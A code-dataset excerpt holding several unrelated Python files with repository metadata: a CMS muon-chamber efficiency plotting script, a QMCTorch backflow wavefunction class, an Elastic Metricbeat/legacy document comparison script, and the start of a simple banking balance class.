rgb[3 * i + 1] = 0.0
rgb[3 * i + 2] = 0.0
pEff[i] = ROOT.TColor.GetColor(rgb[3 * i + 0], rgb[3 * i + 1], rgb[3 * i + 2])
# print 'i= ',i,' pEff= ', pEff[i]
#gStyle.SetPalette(paletteSize, pEff)
#gStyle.SetNumberContours(paletteSize)
#print 'pallete: ', paletteSize, ' \n', pEff
#gStyle.SetNumberContours(nContours)
#gStyle.SetOptStat(0)
#gStyle.SetPalette(paletteSize, pEff)
import sys,os,re
if (sys.argv[0] == "python"): args=sys.argv[2:]
else: args=sys.argv[1:]
#Prefix="/scratch/senka/CSCeff_condor_RunC_matching/"
Prefix="/afs/hep.wisc.edu/cms/senka/CMSSW_7_4_7/src/CSCEfficiency/CSCEfficiency/NtupleAnzScripts/"
Postfix=""
print "TagAndProbeFitResult: ",TagProbeFitResult
#TagProbeFitResult=TagProbeFitResult.split("/")[-1]
ResultPlotsFileName=ResultPlotsFileName.split("/")[-1]
print " ->TagAndProbeFitResult: ",TagProbeFitResult
if len(args)>0:
Prefix=args[0]
if Prefix[-1] != "/":
Prefix+="/"
if len(args)>1:
if args[1] == "bkg":
Postfix="_BkgModeling"
elif args[1] == "sig":
Postfix="_SigModeling"
elif args[1] == "mc":
Postfix="_MCTruth"
else:
Postfix=args[1]
ResultPlotsFileName=Prefix+ResultPlotsFileName.replace(".root",Postfix+".root")
file_out=TFile.Open(ResultPlotsFileName,'RECREATE')
etascheme="abseta"
#etascheme="tracks_eta"
phischeme="shiftedphi"
#phischeme="tracks_phi"
if "pt" in Group:
binning="pt"
plotname="tracks_pt_PLOT_"+etascheme+"_bin0_&_"+phischeme+"_bin0"
elif "eta" in Group:
binning="eta"
plotname=etascheme+"_PLOT_"+phischeme+"_bin0_&_tracks_pt_bin0"
elif "phi" in Group:
binning="phi"
plotname=phischeme+"_PLOT_"+etascheme+"_bin0_&_tracks_pt_bin0"
else:
plotname=phischeme+"_bin0__"+etascheme+"_bin0__tracks_pt_bin0__VoigtianPlusExpo"
if Postfix=="_MCTruth":
plotname+="_&_mcTrue_true"
def GetEff(f_in, path="lct_effV", effcat="fit_eff"):
    """Read a single fitted efficiency value from a TagProbe result file.

    :param f_in: open ROOT TFile produced by the TagProbeFitTreeAnalyzer
    :param path: directory under ``Probes/`` holding the efficiency result
    :param effcat: efficiency category, e.g. ``fit_eff`` or ``cnt_eff``
    :returns: ``[value, abs(low error), high error]``; ``[0., 0., 0.]`` when
              the object is missing or malformed.
    """
    # Same output as the old ``print "...: ",f_in`` statement (two spaces),
    # but valid in both Python 2 and 3.
    print("LCT eff reading file:  %s" % f_in)
    try:
        eff = f_in.Get("Probes/" + path + "/" + effcat).get().find("efficiency")
        return [eff.getVal(), abs(eff.getErrorLo()), eff.getErrorHi()]
    except Exception:
        # BUGFIX: was a bare ``except:`` which also swallowed
        # KeyboardInterrupt/SystemExit; any ROOT lookup failure still falls
        # through to the best-effort zero result below.
        print("\033[97mOther problems, skip %s \033[0m" % f_in.GetName())
        return [0.] * 3
def GetBinnedEffPlot(f_in, path="lct_effV", effcat="fit_eff", st_=0, name_=plotname):
    """Rebuild a binned efficiency TGraphAsymmErrors from a TagProbe canvas.

    Works around several defects of the TagAndProbe output: wrong x values,
    missing/inconsistent y error bars, and efficiencies exceeding 1.

    :param f_in: open ROOT TFile produced by the TagProbeFitTreeAnalyzer
    :param path: directory under ``Probes/`` holding the efficiency results
    :param effcat: efficiency category (``fit_eff`` or ``cnt_eff``)
    :param st_: station index, used to select the eta binning
    :param name_: name of the canvas holding the raw efficiency plot
    :returns: a corrected TGraphAsymmErrors, or ``None`` if the canvas is missing
    """
    print("binned LCT eff reading file:  %s" % f_in)
    canvas_ = f_in.Get("Probes/" + path + "/" + effcat + "_plots/" + name_)
    if not canvas_:
        print("\033[91m Warning: Probes/" + path + "/" + effcat + "_plots/" + name_
              + "  does not exist in " + f_in.GetName() + " \033[0m")
        # BUGFIX: was ``return NULL`` -- NULL is undefined in Python, so this
        # missing-object branch raised a NameError instead of returning.
        return None
    dummyplot_ = canvas_.GetListOfPrimitives().At(0)
    plot_ = canvas_.FindObject("hxy_" + effcat).Clone()
    # we are going to fix the bugs in the tagandprobe package in the following code
    # 1 - recreate the arrays
    nbins = plot_.GetN()
    xval = zeros(nbins, dtype=float)
    xerr = zeros(nbins, dtype=float)
    yerrhi = zeros(nbins, dtype=float)
    yerrlo = zeros(nbins, dtype=float)
    # 2 - the y values are correct
    Y = plot_.GetY()
    # 3 - find the corresponding first bin in the predefined bins for the plot_ first bin0
    # NOTE: relies on Python-2 exec semantics to bind the local ``bins``
    # from the module-level pt/eta/phi binning arrays.
    exec("bins=%sbin%s" % (binning, str(st_) if binning == "eta" else ""))
    X = plot_.GetX()
    for abin in bins:
        if X[0] < abin:
            firstbin = bins.index(abin) - 1
            break
    # 4 - fill the yerror bars from the correct input (only for fit efficiency)
    if effcat == "fit_eff":
        list_ = f_in.Get("Probes/" + path).GetListOfKeys()
        ikey = list_.First()
        while (ikey != list_.After(list_.Last())):
            dirname_ = ikey.GetName()
            binnumber = re.match(r".*" + binning + r"_bin(\d*)_.*", dirname_)
            if binnumber:
                ibin = int(binnumber.group(1)) - firstbin
                if ibin < nbins and ibin >= 0:
                    result_ = f_in.Get("Probes/" + path + "/" + dirname_ + "/fitresults")
                    if result_:
                        value_ = result_.floatParsFinal().find("efficiency")
                        yerrlo[ibin] = abs(value_.getErrorLo())
                        yerrhi[ibin] = value_.getErrorHi()
                        if Y[ibin] < 0.999 and yerrhi[ibin] < 1E-7:
                            # the fit sometimes misses the high error; approximate ErrorHi=ErrorLo
                            yerrhi[ibin] = yerrlo[ibin]
                        if Y[ibin] + yerrhi[ibin] > 1.:
                            # clamp: can happen when ErrorHi was copied from ErrorLo
                            yerrhi[ibin] = 1. - Y[ibin]
            ikey = list_.After(ikey)
    # 5 - fill the correct x values from the binning
    for ibin in range(nbins):
        xval[ibin] = (bins[ibin + firstbin] + bins[ibin + firstbin + 1]) / 2.
        xerr[ibin] = abs(bins[ibin + firstbin + 1] - bins[ibin + firstbin]) / 2.
    # 6 - remake the TGraph with the corrected arrays
    plotname_ = f_in.GetName().replace(Prefix + TagProbeFitResult, "")[:-5] + path
    outputplot = TGraphAsymmErrors(nbins, xval, Y, xerr, xerr, yerrlo, yerrhi)
    outputplot.SetName(plotname_)
    outputplot.SetTitle(outputplot.GetName())
    outputplot.GetXaxis().SetTitle(dummyplot_.GetXaxis().GetTitle())
    outputplot.GetYaxis().SetTitle(dummyplot_.GetYaxis().GetTitle())
    outputplot.GetYaxis().SetTitleOffset(1.2)
    return outputplot
if "Stations" in Group:
Effs=[]
for idx in range(1,n_stations+1):
filename_=Prefix+TagProbeFitResult+stations[idx][1]+".root"
if not os.path.isfile(filename_):
print filename_+" is not found, skip.. "
Effs.append([0.]*6)
continue
f_in=TFile(filename_,"READ");
categoryname="cnt_eff" if Postfix=="_MCTruth" else "fit_eff"
if "pt" in Group or "eta" in Group or "phi" in Group:
LCTEff=GetBinnedEffPlot(f_in, "lct_effV"+Postfix,categoryname,stations[idx][3])
SEGEff=GetBinnedEffPlot(f_in, "seg_effV"+Postfix,categoryname,stations[idx][3])
file_out.cd()
if LCTEff:
LCTEff.Write()
if SEGEff:
SEGEff.Write()
else:
Effs.append( GetEff(f_in, "lct_effV"+Postfix,categoryname)+GetEff(f_in,"seg_effV"+Postfix,categoryname) )
f_in.Close()
if not ("pt" in Group or "eta" in Group or "phi" in Group):
Effs=array(Effs).transpose()*100.
xval=array(range(1,n_stations+1))*1.0
xerr=zeros(n_stations, dtype=float)
SEGEff=TGraphAsymmErrors(n_stations, xval, array(Effs[0]), xerr, xerr, array(Effs[1]), array(Effs[2]))
LCTEff=TGraphAsymmErrors(n_stations, xval, array(Effs[3]), xerr, xerr, array(Effs[4]), array(Effs[5]))
SegCanvas=TCanvas("segment efficiency","segment efficiency",500,500)
SegCanvas.cd()
gStyle.SetPaintTextFormat("4.1f")
SEGEff.SetMaximum(100)
SEGEff.SetMinimum(90)
LCTEff.SetMaximum(100)
LCTEff.SetMinimum(90)
SEGEff.SetMarkerStyle(8)
SEGEff.SetMarkerSize(.5)
SEGEff.Draw("AP")
cms_label.Draw()
LCTCanvas=TCanvas("lct efficiency","lct efficiency",500,500)
LCTCanvas.cd()
LCTEff.SetMarkerStyle(8)
LCTEff.SetMarkerSize(.5)
LCTEff.Draw("AP")
cms_label.Draw()
for st in range(1,n_stations+1):
binnum=SEGEff.GetXaxis().FindBin(st)
SEGEff.GetXaxis().SetBinLabel( binnum,stations[st][1] )
LCTEff.GetXaxis().SetBinLabel( binnum,stations[st][1] )
SEGEff.GetXaxis().SetTitle("Ring")
SEGEff.GetYaxis().SetTitle("Chamber within ring")
file_out.cd()
if LCTEff:
LCTEff.Write("LCTEff")
if SEGEff:
SEGEff.Write("SEGEff")
elif "Chambers" in Group:
SEGEff=TH2F("SEGEff","CSC Segment Reconstruction Efficiency (%)",36,1,37,20,-9,9)
SEGEff.SetMarkerSize(0.7)
gStyle.SetPaintTextFormat("4.1f")
SEGEff.SetContour(500)
SEGEff_upErr=TH2F("SEGEff_upErr","segment efficiency uperror",36,1,37,20,-8.7,9.3)
SEGEff_upErr.SetMarkerSize(0.45)
SEGEff_downErr=TH2F("SEGEff_downErr","segment efficiency loerror",36,1,37,20,-9.3,8.7)
SEGEff_downErr.SetMarkerSize(0.45)
SEGEff.GetYaxis().SetTickLength(0)
Chambers_ = ["01","02","03","04","05","06","07","08","09","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28","29","30","31","32","33","34","35","36"]
Rings_ = ["ME-42","ME-41","ME-32","ME-31","ME-22","ME-21","ME-13","ME-12","ME-11B","ME-11A","ME+11A","ME+11B","ME+12","ME+13","ME+21","ME+22","ME+31","ME+32","ME+41","ME+42"]
for ich in range(36):
SEGEff.GetXaxis().SetBinLabel(ich+1,Chambers_[ich])
SEGEff_upErr.GetXaxis().SetBinLabel(ich+1,Chambers_[ich])
SEGEff.GetXaxis().SetBinLabel(ich+1,Chambers_[ich])
for irg in range(20):
SEGEff.GetYaxis().SetBinLabel(irg+1,Rings_[irg])
SEGEff_upErr.GetYaxis().SetBinLabel(irg+1,Rings_[irg])
SEGEff_downErr.GetYaxis().SetBinLabel(irg+1,Rings_[irg])
LCTEff=SEGEff.Clone("LCTEff")
LCTEff.SetTitle("LCT efficiency")
LCTEff_upErr=SEGEff_upErr.Clone("LCTEff_upErr")
LCTEff_downErr=SEGEff_downErr.Clone("LCTEff_downErr")
LCTEff.GetYaxis().SetTickLength(0)
RingToYMap={(1,4):0,(1,1):1,(1,2):2,(1,3):3,(2,1):4,(2,2):5,(3,1):6,(3,2):7,(4,1):8,(4,2):9}
#split tree to chamber
for idx in range(n_chambers):
ec=chambers[idx][2] == '+'
st=int(chambers[idx][3])
rg=int(chambers[idx][5])
ch=int(chambers[idx][7:])
filename_="%s%s%s.root" % (Prefix,TagProbeFitResult,chambers[idx])
if not os.path.isfile(filename_):
print filename_+" is not found, skip.. "
Effs.append([0.]*6)
continue
f_in=TFile(filename_,"READ");
print "chamber LCT eff reading file: ",f_in
if Postfix=="_MCTruth":
Effs=GetEff(f_in, "lct_effV"+Postfix,"cnt_eff")+GetEff(f_in,"seg_effV"+Postfix,"cnt_eff")
else:
print "reading file: ", f_in, " reading efficiency: ", "seg_effV"+Postfix,"fit_eff"
Effs=GetEff(f_in, "lct_effV"+Postfix,"fit_eff")+GetEff(f_in,"seg_effV"+Postfix,"fit_eff" )
f_in.Close()
iBin_y=RingToYMap[(st,rg)]
iBin_y=11+iBin_y if ec else 10-iBin_y
eff=Effs[0]*100.
if Effs[0]<0.00001:
Effs[0]=0.00001
LCTEff.SetBinContent(ch,iBin_y,Effs[0]*100.);
if (eff>0):
LCTEff_downErr.SetBinContent(ch,iBin_y,Effs[1]*100.);
LCTEff_upErr.SetBinContent(ch,iBin_y,Effs[2]*100.);
eff=Effs[3]*100.
if Effs[3]<0.00001:
Effs[3]=0.00001
SEGEff.SetBinContent(ch,iBin_y,Effs[3]*100.);
if (eff>0):
SEGEff_downErr.SetBinContent(ch,iBin_y,Effs[4]*100.);
SEGEff_upErr.SetBinContent(ch,iBin_y,Effs[5]*100.);
gStyle.SetPaintTextFormat("4.1f")
SegCanvas=TCanvas("segment efficiency","segment efficiency",1500,1000)
SegCanvas.cd()
SEGEff.GetYaxis().SetTitle("Ring")
SEGEff.GetXaxis().SetTitle("Chamber within ring")
SEGEff.GetYaxis().SetTitleOffset(1.35)
# SEGEff.SetTitle("")
SEGEff.Draw("COLZ,TEXT")
SEGEff_upErr.Draw("TEXT,SAME")
SEGEff_downErr.Draw("TEXT,SAME")
SEGEff.SetMaximum(100)
SEGEff.SetMinimum(0)
cms_label.Draw()
LCTCanvas=TCanvas("lct efficiency","lct efficiency",1500,1000)
LCTCanvas.cd()
LCTEff.Draw("COLZ,TEXT")
LCTEff_upErr.Draw("TEXT,SAME")
LCTEff_downErr.Draw("TEXT,SAME")
LCTEff.SetMaximum(100)
LCTEff.SetMinimum(0)
cms_label.Draw()
file_out.cd()
SegCanvas.Write()
SegCanvas.SaveAs("SegCanvas_2D_2016B_matchingAllORME13.pdf")
SegCanvas.SaveAs("SegCanvas_2D_2016B_matchingAllORME13.root")
SegCanvas.SaveAs("SegCanvas_2D_2016B_matchingAllORME13.C")
# LCTCanvas.Write()
# LCTCanvas.SaveAs("LCTCanvas_2D_Run2015CD_0910_HLTIsoT_matchingORME13.pdf")
# LCTCanvas.SaveAs("LCTCanvas_2D_Run2015CD_0910_HLTIsoTkMu_fixedGanging_matchingORME13.root")
# LCTCanvas.SaveAs("LCTCanvas_2D_Run2015CD_0910_HLTIsoTkMu_fixedGanging_matchingORME13.C")
SEGEff.Write()
SEGEff_upErr.Write()
SEGEff_downErr.Write()
LCTEff.Write()
LCTEff_upErr.Write()
LCTEff_downErr.Write()
elif "pt" in Group or "eta" in Group or "phi" in Group:
filename_=Prefix+TagProbeFitResult+"AllStations.root"
print "pt/eta/phi eff reading file: ",f_in
if not os.path.isfile(filename_):
print filename_+" is not found, skip.. "
else:
f_in=TFile(filename_,"READ");
categoryname="cnt_eff" if Postfix=="_MCTruth" else "fit_eff"
LCTEff=GetBinnedEffPlot(f_in, "lct_effV"+Postfix,categoryname)
SEGEff=GetBinnedEffPlot(f_in, "seg_effV"+Postfix,categoryname)
f_in.Close()
file_out.cd()
if LCTEff:
LCTEff.Write("LCTEff")
if SEGEff:
SEGEff.Write("SEGEff")
#raw_input("Plots are saved in "+ResultPlotsFileName+". Press ENTER to exit")
print "Plots are saved in",ResultPlotsFileName+"."
file_out.Close()
| [
"senka.duric@cern.ch"
] | senka.duric@cern.ch | |
5d4d84f517359cc086882223987fee6ac455939a | cb9f44cccdf7cd9b4dec59f18246825364fc6533 | /qmctorch/wavefunction/slater_combined_jastrow_backflow.py | 023ea2861cbc8d430bcc4d0a704f19d39aed7699 | [
"Apache-2.0"
] | permissive | NLESC-JCER/QMCTorch | 83747e0ee41ed74be1ced4d8e9b9897dfcc1bd6a | 439a79e97ee63057e3032d28a1a5ebafd2d5b5e4 | refs/heads/master | 2023-05-25T05:22:06.690810 | 2023-05-13T10:10:13 | 2023-05-13T10:10:13 | 255,629,819 | 22 | 3 | Apache-2.0 | 2023-08-29T19:27:15 | 2020-04-14T14:18:24 | Python | UTF-8 | Python | false | false | 11,173 | py |
import numpy as np
import torch
from .slater_jastrow import SlaterJastrow
import operator
from .jastrows.elec_elec.kernels.pade_jastrow_kernel import PadeJastrowKernel as PadeJastrowKernelElecElec
from .jastrows.jastrow_factor_combined_terms import JastrowFactorCombinedTerms
from .jastrows.elec_nuclei.kernels.pade_jastrow_kernel import PadeJastrowKernel as PadeJastrowKernelElecNuc
from .orbitals.atomic_orbitals_backflow import AtomicOrbitalsBackFlow
from .orbitals.atomic_orbitals_orbital_dependent_backflow import AtomicOrbitalsOrbitalDependentBackFlow
from .orbitals.backflow.kernels import BackFlowKernelInverse
class SlaterManyBodyJastrowBackflow(SlaterJastrow):
    # Slater-Jastrow wave function combining a many-body Jastrow factor
    # (ee + en + een kernels) with a backflow coordinate transformation.

    def __init__(self, mol, configs='ground_state',
                 kinetic='jacobi',
                 jastrow_kernel={
                     'ee': PadeJastrowKernelElecElec,
                     'en': PadeJastrowKernelElecNuc,
                     'een': None},
                 jastrow_kernel_kwargs={
                     'ee': {},
                     'en': {},
                     'een': {}},
                 backflow_kernel=BackFlowKernelInverse,
                 backflow_kernel_kwargs={},
                 orbital_dependent_backflow=False,
                 cuda=False,
                 include_all_mo=True):
        """Slater Jastrow wave function with many-body Jastrow factor and backflow

        .. math::
            \\Psi(R_{at}, r) = J(R_{at}, r)\\sum_n c_n D^\\uparrow_n(q^\\uparrow)D^\\downarrow_n(q^\\downarrow)

        with

        .. math::
            J(r) = \\exp\\left( K_{ee}(r) + K_{en}(R_{at},r) + K_{een}(R_{at}, r) \\right)

        with the different kernels representing electron-electron, electron-nuclei
        and electron-electron-nuclei terms, and

        .. math::
            q(r_i) = r_i + \\sum_{j\\neq i} K_{BF}(r_{ij})(r_i-r_j)

        is a backflow transformation defined by the kernel K_{BF}. Note that a different
        transformation can be used for each orbital via the `orbital_dependent_backflow` option.

        Args:
            mol (Molecule): a QMCTorch molecule object
            configs (str, optional): defines the CI configurations to be used. Defaults to 'ground_state'.
                - ground_state : only the ground state determinant in the wave function
                - single(n,m) : only single excitation with n electrons and m orbitals
                - single_double(n,m) : single and double excitation with n electrons and m orbitals
                - cas(n, m) : all possible configuration using n electrons and m orbitals
            kinetic (str, optional): method to compute the kinetic energy. Defaults to 'jacobi'.
                - jacobi : use the Jacobi formula to compute the kinetic energy
                - auto : use automatic differentiation to compute the kinetic energy
            jastrow_kernel (dict, optional): different Jastrow kernels for the different terms.
                By default only electron-electron and electron-nuclei terms are used;
                ``None`` disables the Jastrow factor altogether.
            jastrow_kernel_kwargs (dict, optional): keyword arguments for the Jastrow kernel constructors
            backflow_kernel (BackFlowKernelBase, optional): kernel function of the backflow transformation.
                By default an inverse kernel K(r_{ij}) = w/r_{ij} is used
            backflow_kernel_kwargs (dict, optional): keyword arguments for the backflow kernel constructor
            orbital_dependent_backflow (bool, optional): every orbital has a different transformation if True.
                Defaults to False
            cuda (bool, optional): turns GPU ON/OFF. Defaults to False.
            include_all_mo (bool, optional): include either all molecular orbitals or only the ones that are
                populated in the configs. Defaults to True

        Examples::
            >>> from qmctorch.scf import Molecule
            >>> from qmctorch.wavefunction import SlaterManyBodyJastrowBackflow
            >>> mol = Molecule('h2o.xyz', calculator='adf', basis = 'dzp')
            >>> wf = SlaterManyBodyJastrowBackflow(mol, configs='cas(2,2)')
        """
        super().__init__(mol, configs, kinetic, None, {}, cuda, include_all_mo)

        # process the backflow transformation: one kernel per orbital or a
        # single kernel shared by all orbitals
        if orbital_dependent_backflow:
            self.ao = AtomicOrbitalsOrbitalDependentBackFlow(
                mol, backflow_kernel, backflow_kernel_kwargs, cuda)
        else:
            self.ao = AtomicOrbitalsBackFlow(
                mol, backflow_kernel, backflow_kernel_kwargs, cuda)

        if self.cuda:
            self.ao = self.ao.to(self.device)

        # process the Jastrow
        if jastrow_kernel is not None:
            # NOTE(review): jastrow_kernel / jastrow_kernel_kwargs use mutable
            # dict defaults and are filled in below, so a partial dict passed
            # by the caller is mutated in place — confirm this is intended.
            for k in ['ee', 'en', 'een']:
                if k not in jastrow_kernel.keys():
                    jastrow_kernel[k] = None
                if k not in jastrow_kernel_kwargs.keys():
                    jastrow_kernel_kwargs[k] = None

            self.use_jastrow = True
            self.jastrow_type = 'JastrowFactorCombinedTerms'

            self.jastrow = JastrowFactorCombinedTerms(
                self.mol.nup, self.mol.ndown,
                torch.as_tensor(self.mol.atom_coords),
                jastrow_kernel=jastrow_kernel,
                jastrow_kernel_kwargs=jastrow_kernel_kwargs,
                cuda=cuda)

            if self.cuda:
                # nn.Module.to() moves parameters in place, so the rebinding
                # of the loop variable is harmless here.
                for term in self.jastrow.jastrow_terms:
                    term = term.to(self.device)

        self.log_data()

    def forward(self, x, ao=None):
        """computes the value of the wave function for the sampling points

        .. math::
            J(R) \\Psi(R) = J(R) \\sum_{n} c_n D^{u}_n(r^u) \\times D^{d}_n(r^d)

        Args:
            x (torch.tensor): sampling points (Nbatch, 3*Nelec)
            ao (torch.tensor, optional): precomputed values of the atomic orbitals (Nbatch, Nelec, Nao)

        Returns:
            torch.tensor: values of the wave functions at each sampling point (Nbatch, 1)

        Examples::
            >>> mol = Molecule('h2.xyz', calculator='adf', basis = 'dzp')
            >>> wf = SlaterJastrow(mol, configs='cas(2,2)')
            >>> pos = torch.rand(500,6)
            >>> vals = wf(pos)
        """
        # compute the jastrow factor from the raw positions
        if self.use_jastrow:
            J = self.jastrow(x)

        # backflow-transformed atomic orbitals
        if ao is None:
            x = self.ao(x)
        else:
            x = ao

        # molecular orbitals from the SCF coefficients
        x = self.mo_scf(x)

        # mix the mos
        x = self.mo(x)

        # pool the mos into Slater determinants
        x = self.pool(x)

        # weight the determinants with the CI coefficients and return
        if self.use_jastrow:
            return J * self.fc(x)
        else:
            return self.fc(x)

    def ao2mo(self, ao):
        """transforms AO values into MO values (SCF projection + mixing)."""
        return self.mo(self.mo_scf(ao))

    def pos2mo(self, x, derivative=0, sum_grad=True):
        """Compute the MO values directly from the electron positions.

        Args:
            x (torch.tensor): sampling points (Nbatch, 3*Nelec)
            derivative (int, optional): derivative order requested from the AOs. Defaults to 0.
            sum_grad (bool, optional): sum the gradient components if True. Defaults to True.

        Returns:
            torch.tensor: MO values (or their derivatives)
        """
        ao = self.ao(x, derivative=derivative, sum_grad=sum_grad)
        return self.ao2mo(ao)

    def kinetic_energy_jacobi(self, x, **kwargs):
        r"""Compute the value of the kinetic energy using the Jacobi Formula.

        .. math::
             \\frac{\Delta (J(R) \Psi(R))}{ J(R) \Psi(R)} = \\frac{\\Delta J(R)}{J(R)}
             + 2 \\frac{\\nabla J(R)}{J(R)} \\frac{\\nabla \\Psi(R)}{\\Psi(R)}
             + \\frac{\\Delta \\Psi(R)}{\\Psi(R)}

        The laplacian of the determinantal part is computed via

        .. math::
            \\Delta_i \\Psi(R) \\sum_n c_n ( \\frac{\\Delta_i D_n^{u}}{D_n^{u}} +
                                          \\frac{\\Delta_i D_n^{d}}{D_n^{d}} +
                                          2 \\frac{\\nabla_i D_n^{u}}{D_n^{u}} \\frac{\\nabla_i D_n^{d}}{D_n^{d}} )
                                          D_n^{u} D_n^{d}

        Since the backflow orbitals are multi-electronic the laplacian of the determinants
        are obtained

        .. math::
            \\frac{\\Delta det(A)}{det(A)} = Tr(A^{-1} \\Delta A) +
                                          Tr(A^{-1} \\nabla A) Tr(A^{-1} \\nabla A) +
                                          Tr( (A^{-1} \\nabla A) (A^{-1} \\nabla A ))

        Args:
            x (torch.tensor): sampling points (Nbatch, 3*Nelec)

        Returns:
            torch.tensor: values of the kinetic energy at each sampling points
        """

        # get the ao values and their first/second derivatives
        ao, dao, d2ao = self.ao(
            x, derivative=[0, 1, 2], sum_grad=False)

        # get the mo values
        mo = self.ao2mo(ao)
        dmo = self.ao2mo(dao)
        d2mo = self.ao2mo(d2ao)

        # compute the value of the slater det
        slater_dets = self.pool(mo)
        sum_slater_dets = self.fc(slater_dets)

        # compute ( tr(A_u^-1\Delta A_u) + tr(A_d^-1\Delta A_d) )
        hess = self.pool.operator(mo, d2mo)

        # compute (tr(A_u^-1\nabla A_u) and tr(A_d^-1\nabla A_d))
        grad = self.pool.operator(mo, dmo, op=None)

        # compute (tr((A_u^-1\nabla A_u)^2) + tr((A_d^-1\nabla A_d))^2)
        grad2 = self.pool.operator(mo, dmo, op_squared=True)

        # assemble the total second derivative term of the determinants
        hess = (hess.sum(0)
                + operator.add(*[(g**2).sum(0) for g in grad])
                - grad2.sum(0)
                + 2 * operator.mul(*grad).sum(0))

        hess = self.fc(hess * slater_dets) / sum_slater_dets

        if self.use_jastrow is False:
            return -0.5 * hess

        # compute the Jastrow terms and their derivatives
        jast, djast, d2jast = self.jastrow(x,
                                           derivative=[0, 1, 2],
                                           sum_grad=False)

        # prepare the second derivative term d2Jast/Jast
        # Nbatch x Nelec
        d2jast = d2jast / jast

        # prepare the first derivative term dJast/Jast
        djast = djast / jast.unsqueeze(-1)

        # -> Nelec x Ndim x Nbatch
        djast = djast.permute(2, 1, 0)

        # -> [Nelec*Ndim] x Nbatch
        djast = djast.reshape(-1, djast.shape[-1])

        # prepare the grad of the dets
        # [Nelec*Ndim] x Nbatch x 1
        grad_val = self.fc(operator.add(*grad) *
                           slater_dets) / sum_slater_dets

        # [Nelec*Ndim] x Nbatch
        grad_val = grad_val.squeeze()

        # assemble the derivative terms
        out = d2jast.sum(-1) + 2*(grad_val * djast).sum(0) + \
            hess.squeeze(-1)

        return -0.5 * out.unsqueeze(-1)

    def gradients_jacobi(self, x, sum_grad=True):
        """Computes the gradients of the wf using Jacobi's Formula.

        Not supported for backflow orbitals.

        Args:
            x (torch.tensor): sampling points (Nbatch, 3*Nelec)
            sum_grad (bool, optional): sum the gradient components if True. Defaults to True.

        Raises:
            NotImplementedError: always; backflow orbitals are multi-electronic.
        """
        raise NotImplementedError(
            'Gradient through Jacobi formulat not implemented for backflow orbitals')
| [
"nicolas.gm.renaud@gmail.com"
] | nicolas.gm.renaud@gmail.com |
0b8906daed72ba0039fe0761e437da2e6a1ea053 | 312fe86a9540b7bfabcaadd5f20ba107755b195b | /playbooks/monitoring/kibana/docs_compare.py | f421ce5d3d53e5c2befc2e6f379b42c935ca6489 | [
"Apache-2.0"
] | permissive | isabella232/elastic-stack-testing | fa623cce484ecf870c5e90da6b401b3f4c2ce296 | 1526ab4b4ca187dc5f0eb81be2fed058fc556082 | refs/heads/master | 2023-01-05T13:26:22.430049 | 2020-11-09T18:19:44 | 2020-11-09T18:19:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,709 | py | '''
Usage:
python docs_compare.py /path/to/legacy/docs /path/to/metricbeat/docs
'''
from docs_compare_util import check_parity
import sys
# Fields that legacy collection reports but Metricbeat intentionally drops;
# their absence from the Metricbeat docs is not a parity failure.
allowed_deletions_from_metricbeat_docs_extra = [
    # 'path.to.field'
    'kibana_stats.response_times.max',
    'kibana_stats.response_times.average'
]

# Usage properties that do not report consistently between collection modes
# (see the issue links in handle_special_cases); they are normalized away
# before comparison.
unused_kibana_usage_properties = [
    "apm",
    "localization",
    "lens",
    "actions",
    "alerts"
]


def handle_special_case_kibana_settings(legacy_doc, metricbeat_doc):
    """Drop a null default_admin_email from the legacy settings doc.

    Legacy collection indexes kibana_settings.xpack.default_admin_email as
    null, whereas Metricbeat collection simply won't index it, so a null
    value is removed before the parity check. *metricbeat_doc* is unused but
    kept for signature parity with the other handlers.
    """
    xpack = legacy_doc["kibana_settings"].get("xpack")
    # ``is None`` (not ``== None``): identity is the correct idiom for the
    # null check and is immune to exotic __eq__ implementations.
    if xpack and "default_admin_email" in xpack and xpack["default_admin_email"] is None:
        del xpack["default_admin_email"]


def handle_special_case_kibana_stats(legacy_doc, metricbeat_doc):
    """Copy fields known to diverge from the legacy doc into the Metricbeat
    doc so they compare equal.
    """
    # Special case this until we have resolution on
    # https://github.com/elastic/kibana/pull/70677#issuecomment-662531529
    legacy_search = legacy_doc["kibana_stats"]["usage"]["search"]
    metricbeat_search = metricbeat_doc["kibana_stats"]["usage"]["search"]
    for field in ("total", "averageDuration"):
        metricbeat_search[field] = legacy_search[field]
    # Special case for https://github.com/elastic/kibana/pull/76730
    # To be removed if/when https://github.com/elastic/beats/issues/21092 is resolved
    for field in ("cpuacct", "cpu"):
        metricbeat_doc["kibana_stats"]["os"][field] = legacy_doc["kibana_stats"]["os"][field]


def filter_kibana_usage_stats(legacy_doc, metricbeat_doc):
    """Overwrite inconsistently-reported usage properties in the legacy doc
    with the Metricbeat values so they do not affect the comparison.
    """
    for prop in unused_kibana_usage_properties:
        legacy_doc["kibana_stats"]["usage"][prop] = metricbeat_doc["kibana_stats"]["usage"][prop]


def handle_special_cases(doc_type, legacy_doc, metricbeat_doc):
    """Normalize a (legacy, metricbeat) doc pair in place before comparison."""
    if doc_type == "kibana_settings":
        handle_special_case_kibana_settings(legacy_doc, metricbeat_doc)
    if doc_type == "kibana_stats":
        # Lens, Actions, and other usage stats might not report consistently:
        # https://github.com/elastic/kibana/issues/80983
        # https://github.com/elastic/kibana/issues/80986
        # https://github.com/elastic/kibana/issues/81944
        # so we filter out whatever we don't use (or might change).
        filter_kibana_usage_stats(legacy_doc, metricbeat_doc)
        handle_special_case_kibana_stats(legacy_doc, metricbeat_doc)
# Entry point: compare the legacy vs Metricbeat doc trees passed on the
# command line, applying the special-case normalizations defined above.
check_parity(handle_special_cases, allowed_deletions_from_metricbeat_docs_extra=allowed_deletions_from_metricbeat_docs_extra)
| [
"noreply@github.com"
] | isabella232.noreply@github.com |
d0f72f2c74e04492606256a0d23728e050e02a0e | 7a91286a3636ad9606d5933619401cc45bee1b10 | /lib/banking/balance.py | db0904c2b45181d536718a1e76a3f25b00e70e80 | [] | no_license | phriscage/banking_application | d063bbb24c3e1061c2110c1aace1d67ae53e70cc | cc120437213a25e1864db14509c6d143b65d8102 | refs/heads/master | 2019-01-02T04:00:30.034945 | 2015-01-31T03:50:42 | 2015-01-31T03:50:42 | 30,099,098 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 574 | py | """
balance class
"""
class Balance(object):
    """Running integer balance supporting credit and debit operations."""

    def __init__(self):
        """Start with an empty (zero) balance."""
        self.total = 0

    def add(self, value):
        """Credit value (coerced to int) to the running total.

        Args:
            value (int): numeric value
        """
